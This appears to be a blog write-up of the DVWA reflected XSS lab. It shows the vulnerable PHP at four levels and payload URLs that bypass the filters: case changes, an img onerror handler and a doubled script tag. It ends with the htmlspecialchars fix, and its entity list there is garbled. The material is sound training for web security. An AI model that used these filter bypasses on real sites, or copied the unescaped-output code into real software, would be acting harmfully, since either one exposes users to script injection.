Reflected Cross Site Scripting (XSS)

Preface

Reflected Cross Site Scripting (XSS). Attackers make attack links beforehand and need to trick users into clicking on them to trigger XSS code (no such pages or content on the server). It is usually easy to appear on search pages.

The following four levels of reflective XSS vulnerabilities are analyzed:

 

 

  • Low

Server Core Code:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Feedback for end user
	$html .= '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

You can see that the server simply determines if the name parameter value exists and writes the pre tag directly.

 

Vulnerability Utilization

Since there is no protection, we can inject it directly:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<script>alert('You are attacked!')</script>

See injected statements executed as script s:

 

 

  • Medium

Server Core Code:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Get input
	$name = str_replace( '<script>', '', $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

?>

The Medium-level server filters script tags, but it does not filter capitally (which can be defended against by a regular pattern).

 

Vulnerability Utilization

There are three ways to do this:

  • Method 1: Case Bypass

One thing to understand here is

  • Case insensitive in HTML
  • Case Sensitive in JS

So our injection statements are:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<Script>alert('You are attacked!')</scRipt>

  • Method 2: Error Event img tag bypass

General operations.

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<img src="" onerror="alert('You are attacked!')">

  • Method 3: Double Write Bypass

Since the server has only been filtered once with str_place(), it cannot match all the occurrences of multiple occurrences, so it can be bypassed by double writing here:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<s<script>cript>alert('You are attacked!')</script>

 

 

  • High

Server Core Code:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Get input
	$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

?>

As you can see, the server uses regular and case-insensitive filtering to filter all script tags. It seems that the server has a special love for script tags.

 

Vulnerability Utilization

Although script tags are filtered, other tag injection is possible, such as method two at the Medium level:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<img src="" onerror="alert('You are attacked!')">

 

 

  • Impossible

Server Core Code:

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$name = htmlspecialchars( $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>
  • htmlspecialchars() function

Converts some predefined characters to HTML entities.

The predefined characters are:

& (and sign) becomes &

"(double quotes) becomes "

'(single quotation mark) becomes &039;

< (Less than) becomes <

> (greater than) becomes >

Use the htmlspecialchars function to convert predefined characters &, ",', <, > into HTML entities, preventing browsers from using them as HTML elements.

Published 51 original articles, won approval 2, visited 1335
Private letter follow

Tags: PHP less

Posted on Sun, 09 Feb 2020 22:44:55 -0500 by dfego